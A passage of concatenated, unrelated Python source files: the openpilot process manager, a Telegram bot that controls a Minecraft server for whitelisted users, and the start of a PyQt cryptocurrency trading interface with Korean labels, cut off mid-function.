self.query('%s.A=1' % self.bitblock)
time.sleep(0.001)
self.query('%s.A=0' % self.bitblock)
def stop(self):
self.query('*PCAP.DISARM=')
def read(self):
return self.data
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from common.op_params import opParams
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1225
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
KILL_UPDATED = opParams().get('update_behavior').lower().strip() == 'off' or os.path.exists('/data/no_ota_updates')
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
# shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
# shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
# "lanespeedd": "selfdrive.controls.lib.lane_speed",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
# 'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if not KILL_UPDATED:
persistent_processes.append('updated')
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
# 'lanespeedd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
spinner.close()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
device_state_sock = messaging.sub_sock('deviceState')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(device_state_sock, wait=True)
if msg.deviceState.freeSpacePercent < 5:
logger_dead = True
run_all = False
if msg.deviceState.started or run_all:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.deviceState.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
prepare_managed_process(p)
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
bot.py
|
import telebot
import subprocess
import json
import os
from threading import Thread , Lock
from queue import Queue, Empty
process = None
q = None
t = None
cwd = os.path.dirname(os.path.realpath(__file__))
config_path = os.path.join(cwd,'config.json')
with open(config_path) as configFile:
config = json.load(configFile)
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
def out_log():
out = []
decodeLine = True
while decodeLine:
try:
line = q.get_nowait()
except Empty:
decodeLine=False
else:
out.append(line.decode().replace('[Server thread/INFO]',''))
return out
bot = telebot.TeleBot(config["bot-token"])
@bot.message_handler(commands=['start' ,'s'])
def start_server(message):
global process
global t
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Starting Minecraft Server...")
args = config['args']
serverDir = config['server-directory']
jarName = config['jar-name']
process = subprocess.Popen(['java', *args , '-jar' , jarName , 'nogui'],stdin=subprocess.PIPE, stdout=subprocess.PIPE,stderr=subprocess.PIPE , cwd=serverDir)
q = Queue()
t = Thread(target=enqueue_output, args=(process.stdout, q))
t.daemon = True
t.start()
else:
bot.reply_to(message, "the server is already up tyoe /output to view the stdout or /stop to stop the server")
except Exception as e:
print('Error in start ' + str(e))
@bot.message_handler(commands=['stop'])
def stop_server(message):
global process
global t
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Server is not yet started! Use /start to start the server")
else:
if not process.stdin.closed:
process.stdin.write(b'stop\n')
process.stdin.flush()
process.communicate()
process.terminate()
process = None
t = None
q = None
bot.reply_to(message, 'Server Stopped, type /start to start the server')
except Exception as e:
print('Error in stop ' + str(e))
bot.reply_to(message, 'Unable to stop the server. Try again /stop or contact admin')
@bot.message_handler(commands=['output','o'])
def info_server(message):
global process
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Server is not yet started! Use /start to start the server")
else:
out = out_log()
if not out:
bot.reply_to(message, 'No output yet!')
else:
string = ''.join(out)
numoftime = len(string)//4096 + 1 #has to split the message if its too long
for i in range(1,numoftime +1):
part = out[len(out)//numoftime*(i-1):len(out)//numoftime*i]
bot.reply_to(message,''.join(part))
except Exception as e:
print('Error in info ' + str(e))
@bot.message_handler(commands=['command' , 'c'])
def exec_command(message):
global process
global t
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Server is not yet started! Use /start to start the server")
else:
command = message.text.replace('/command ' , '')
if 'stop' in command:
bot.reply_to(message,'To stop the server use /stop command!')
elif not process.stdin.closed :
command += "\n"
process.stdin.write(command.encode())
process.stdin.flush()
bot.reply_to(message, 'Command executed!Type /output to see the output')
else:
bot.reply_to(message, 'Unable to use this command right now, /stop the server and /start again')
except Exception as e:
print('Error in command ' + str(e))
@bot.message_handler(commands=['reload_config'])
def fetch_whitelist(message):
global config
try:
if message.from_user.username in config['whitelist']:
with open(config_path) as configFile:
config = json.load(configFile)
bot.reply_to(message, 'Config File reloaded')
except Exception as e:
print('Error during reload config command ' + str(e))
@bot.message_handler(commands=['ping'])
def info_server(message):
try:
if message.from_user.username in config['whitelist']:
bot.reply_to(message , 'pong')
except Exception as e:
print('Error during ping command ' + str(e))
bot.polling()
|
main.py
|
import configparser
import sys
from operator import itemgetter
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt, QTimer
from PyQt5.QtGui import QIcon
import requests
import quotation_func
import exchange_func
import config
import time
import datetime
import schedule
import random
import multiprocessing as mp
import threading
class MyWindow(QMainWindow):
def __init__(self):
super().__init__()
# self.setGeometry(100, 200, 300, 200)
self.setWindowTitle("Coin Trade")
self.btnSearch = QPushButton("시세조회", self)
self.btnSearch.move(1200, 100)
self.btnSearch.setToolTip('Search Market')
self.btnSearch.clicked.connect(self.search_today_ticker)
self.btnSearchAccount = QPushButton("계좌조회", self)
self.btnSearchAccount.move(1200, 130)
self.btnSearchAccount.clicked.connect(self.search_account)
self.btnTrade = QPushButton("매매", self)
self.btnTrade.move(1300, 130)
self.btnTrade.clicked.connect(self.trade_coin)
self.chbAutoTrade = QCheckBox("자동매매", self)
self.chbAutoTrade.move(1310, 160)
# self.chbAutoTrade.stateChanged.connect(self.start_auto_trade)
self.btnCalcProfit = QPushButton("수익률 계산", self)
self.btnCalcProfit.move(1200, 160)
self.btnCalcProfit.clicked.connect(self.calc_top_item_profit)
self.txtProfit10 = QTextEdit(self)
self.txtProfit10.move(1200, 200)
self.txtProfit20 = QTextEdit(self)
self.txtProfit20.move(1200, 250)
# KRW 마켓 목록
self.marketTable = QTableWidget(4, 3, self)
self.marketTable.setGeometry(10, 100, 200, 300)
# 당일 시세 목록
self.tickerTableLabel = QLabel("당일 시세", self)
self.tickerTableLabel.move(10, 70)
self.tickerTable = QTableWidget(self)
self.tickerTable.setGeometry(10, 100, 1150, 400)
self.tickerTable.doubleClicked.connect(self.ticker_double_clicked)
self.tickerTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.tickerTable.setSelectionBehavior(QAbstractItemView.SelectRows) # Row 단위 선택
self.tickerTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # 셀 edit 금지
ticker_add_favor_action = QAction('계속 보유에 추가', self.tickerTable)
ticker_add_except_action = QAction('거래 제외에 추가', self.tickerTable)
ticker_buy_coin_action = QAction('매수', self.tickerTable)
self.tickerTable.addAction(ticker_add_favor_action)
self.tickerTable.addAction(ticker_add_except_action)
self.tickerTable.addAction(ticker_buy_coin_action)
ticker_add_favor_action.triggered.connect(self.ticker_add_favor)
ticker_add_except_action.triggered.connect(self.ticker_add_except)
ticker_buy_coin_action.triggered.connect(self.ticker_buy_coin)
# 보유 마켓 목록
self.accountTableLabel = QLabel("보유 종목", self)
self.accountTableLabel.move(10, 500)
self.accountTable = QTableWidget(0, 0, self)
self.accountTable.setGeometry(10, 530, 650, 300)
self.accountTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.accountTable.setSelectionBehavior(QAbstractItemView.SelectRows) # Row 단위 선택
self.accountTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # 셀 edit 금지
acc_add_favor_action = QAction('계속 보유에 추가', self.accountTable)
acc_add_except_action = QAction('거래 제외에 추가', self.accountTable)
acc_sell_coin_action = QAction('매도', self.accountTable)
self.accountTable.addAction(acc_add_favor_action)
self.accountTable.addAction(acc_add_except_action)
self.accountTable.addAction(acc_sell_coin_action)
acc_add_favor_action.triggered.connect(self.acc_add_favor)
acc_add_except_action.triggered.connect(self.acc_add_except)
acc_sell_coin_action.triggered.connect(self.acc_sell_coin)
# 거래 관심 대상 목록
self.favorMarketTableLabel = QLabel("보유 대상 종목", self)
self.favorMarketTableLabel.move(700, 500)
self.favorMarketTable = QTableWidget(0, 1, self)
self.favorMarketTable.setGeometry(700, 530, 130, 300)
self.favorMarketTable.horizontalHeader().setVisible(False) # 열번호 안나오게 하는 코드
self.favorMarketTable.setSelectionBehavior(QAbstractItemView.SelectRows) # Row 단위 선택
self.favorMarketTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # 셀 edit 금지
self.favorMarketTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.favorMarketTable.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
remove_favor_action = QAction('제거', self.favorMarketTable)
self.favorMarketTable.addAction(remove_favor_action)
remove_favor_action.triggered.connect(self.favor_remove_market)
# 거래 제외 대상 목록
self.exceptMarketTableLabel = QLabel("제외 대상 종목", self)
self.exceptMarketTableLabel.move(850, 500)
self.exceptMarketTable = QTableWidget(0, 1, self)
self.exceptMarketTable.setGeometry(850, 530, 130, 300)
self.exceptMarketTable.horizontalHeader().setVisible(False) # 열번호 안나오게 하는 코드
self.exceptMarketTable.setSelectionBehavior(QAbstractItemView.SelectRows) # Row 단위 선택
self.exceptMarketTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # 셀 edit 금지
self.exceptMarketTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.exceptMarketTable.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
remove_except_action = QAction('제거', self.exceptMarketTable)
self.exceptMarketTable.addAction(remove_except_action)
remove_except_action.triggered.connect(self.except_remove_market)
# 매수 종목
self.buyTableLabel = QLabel("매수 대상", self)
self.buyTableLabel.move(1000, 500)
self.buyTable = QTableWidget(0, 1, self)
self.buyTable.setGeometry(1000, 530, 130, 130)
self.buyTable.horizontalHeader().setVisible(False) # 열번호 안나오게 하는 코드
self.buyTable.setSelectionBehavior(QAbstractItemView.SelectRows) # Row 단위 선택
self.buyTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # 셀 edit 금지
self.buyTable.setContextMenuPolicy(Qt.ActionsContextMenu)
# 매도 종목
self.sellTableLabel = QLabel("매도 대상", self)
self.sellTableLabel.move(1000, 670)
self.sellTable = QTableWidget(0, 1, self)
self.sellTable.setGeometry(1000, 700, 130, 130)
self.sellTable.horizontalHeader().setVisible(False) # 열번호 안나오게 하는 코드
self.sellTable.setSelectionBehavior(QAbstractItemView.SelectRows) # Row 단위 선택
self.sellTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # 셀 edit 금지
self.sellTable.setContextMenuPolicy(Qt.ActionsContextMenu)
# MarketCap List
self.marketCapTableLabel = QLabel("마켓 순위", self)
self.marketCapTableLabel.move(1200, 320)
self.marketCapTable = QTableWidget(0, 1, self)
self.marketCapTable.setGeometry(1200, 350, 200, 500)
self.marketCapTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.statusBar().showMessage('Ready')
self.exitAction = QAction(QIcon('exit.png'), 'Exit', self)
self.exitAction.setShortcut('Ctrl+Q')
self.exitAction.setStatusTip('Exit application')
self.exitAction.triggered.connect(qApp.quit)
self.searched_user_api_key = []
self.watch_market_list = []
# Kimchi Coin List
self.kimchi_market_list = []
self.kimchi_time = False
self.timer_one = QTimer()
self.timer_one.setInterval(60000)
self.timer_one.timeout.connect(self.do_time_schedule)
self.timer_one.start()
# 화면 구성
menu_bar = self.menuBar()
menu_bar.setNativeMenuBar(False)
file_menu = menu_bar.addMenu('&File')
file_menu.addAction(self.exitAction)
self.toolbar = self.addToolBar('Exit')
self.toolbar.addAction(self.exitAction)
# 시작할 때 바로 수행
self.init_func()
# 화면 시작할 때 처리하는 내용
def init_func(self):
self.config_add_favor()
self.do_time_schedule()
self.chbAutoTrade.setChecked(True)
'''
def keyPressEvent(self, e):
if e.key() == Qt.Key_Escape:
self.close()
elif e.key() == Qt.Key_F:
self.showFullScreen()
elif e.key() == Qt.Key_N:
self.showNormal()
def mousePressEvent(self, e):
if e.buttons() & Qt.LeftButton:
print('LEFT')
if e.buttons() & Qt.RightButton:
print('RIGHT')
'''
'''
자동매매 체크 버튼 상태 변화시 수행
def start_auto_trade(self, state):
print('chbox1 : ' + str(state))
if state:
print('ok')
'''
def ticker_double_clicked(self):
row = self.tickerTable.currentRow()
col = self.tickerTable.currentColumn()
item = self.tickerTable.currentItem()
print(row, col, item, item.text())
def ticker_add_favor(self):
market = self.tickerTable.item(self.tickerTable.currentRow(), 0).text()
# print('tickerTable_add_favor', item)
self.favorMarketTable.insertRow(self.favorMarketTable.rowCount())
self.favorMarketTable.setItem(self.favorMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
# ini 파일에 추가
self.update_config_market('I', 'FAVOR', market)
def ticker_add_except(self):
market = self.tickerTable.item(self.tickerTable.currentRow(), 0).text()
# print('tickerTable_add_except', item)
self.exceptMarketTable.insertRow(self.exceptMarketTable.rowCount())
self.exceptMarketTable.setItem(self.exceptMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
# ini 파일에 추가
self.update_config_market('I', 'EXCEPT', market)
def acc_add_favor(self):
market = self.accountTable.item(self.accountTable.currentRow(), 5).text() + '-' + \
self.accountTable.item(self.accountTable.currentRow(), 0).text()
# print('tickerTable_add_favor', item)
self.favorMarketTable.insertRow(self.favorMarketTable.rowCount())
self.favorMarketTable.setItem(self.favorMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
# ini 파일에 추가
self.update_config_market('I', 'FAVOR', market)
def acc_add_except(self):
market = self.accountTable.item(self.accountTable.currentRow(), 5).text() + '-' + \
self.accountTable.item(self.accountTable.currentRow(), 0).text()
# print('tickerTable_add_except', item)
self.exceptMarketTable.insertRow(self.exceptMarketTable.rowCount())
self.exceptMarketTable.setItem(self.exceptMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
# ini 파일에 추가
self.update_config_market('I', 'EXCEPT', market)
def favor_remove_market(self):
market = self.favorMarketTable.item(self.favorMarketTable.currentRow(), 0).text()
self.update_config_market('D', 'FAVOR', market)
self.favorMarketTable.removeRow(self.favorMarketTable.currentRow())
def except_remove_market(self):
market = self.exceptMarketTable.item(self.exceptMarketTable.currentRow(), 0).text()
self.update_config_market('D', 'EXCEPT', market)
self.exceptMarketTable.removeRow(self.exceptMarketTable.currentRow())
# Config 에 등록되어 있는 항목을 화면에 반영
def config_add_favor(self):
config_file = configparser.ConfigParser()
if config_file.read(config.ini_file_name, encoding='utf-8'):
# 해당 USER가 있는지 확인하여 값 셋팅
if config_file.has_section('MARKET'):
# 보유 대상 입력
if config_file.has_option('MARKET', 'FAVOR'):
favor_market = config_file['MARKET']['FAVOR'].split(',')
for market in favor_market:
self.favorMarketTable.insertRow(self.favorMarketTable.rowCount())
self.favorMarketTable.setItem(self.favorMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
# 제외 대상 입력
if config_file.has_option('MARKET', 'EXCEPT'):
except_market = config_file['MARKET']['EXCEPT'].split(',')
for market in except_market:
self.exceptMarketTable.insertRow(self.exceptMarketTable.rowCount())
self.exceptMarketTable.setItem(self.exceptMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
# 주요 코인 목록 입력
for i in range(1, 5):
section = 't' + str(i)
if config_file.has_option('MARKET', section):
major_market = config_file['MARKET'][section].split(',')
for market in major_market:
self.watch_market_list.append(market)
# 김치 코인 목록 입력
for i in range(1, 5):
section = 'kimchi' + str(i)
if config_file.has_option('MARKET', section):
kimchi_market = config_file['MARKET'][section].split(',')
for market in kimchi_market:
self.kimchi_market_list.append(market)
def search_account_market(self):
account_market = []
for row in range(0, self.accountTable.rowCount()):
market = self.accountTable.item(row, 5).text() + '-' + self.accountTable.item(row, 0).text()
# print(row, market)
if self.accountTable.item(row, 5).text() != self.accountTable.item(row, 0).text() and \
self.accountTable.item(row, 0).text() != 'VTHO':
account_market.append(market)
return account_market
def buy_coin(self, order_market, side_val, hoga_level=0, buy_volume=0, buy_amount=0):
orderbook_market = order_market
orderbook_list = quotation_func.search_orderbook(orderbook_market)
price = 0
position_amount = 0
if len(orderbook_list) == 0:
print(' order book Data Not Found')
return
if side_val == 'bid' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['ask_price'],
# orderbook_list[1][4][hoga_level]['ask_size'])
price = orderbook_list[1][4][hoga_level]['ask_price']
elif side_val == 'bid' and hoga_level < 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['bid_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['bid_size'])
price = orderbook_list[1][4][abs(hoga_level + 1)]['bid_price']
elif side_val == 'ask' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['bid_price'],
# orderbook_list[1][4][hoga_level]['bid_size'])
price = orderbook_list[1][4][hoga_level]['bid_price']
elif side_val == 'ask' and hoga_level < 0:
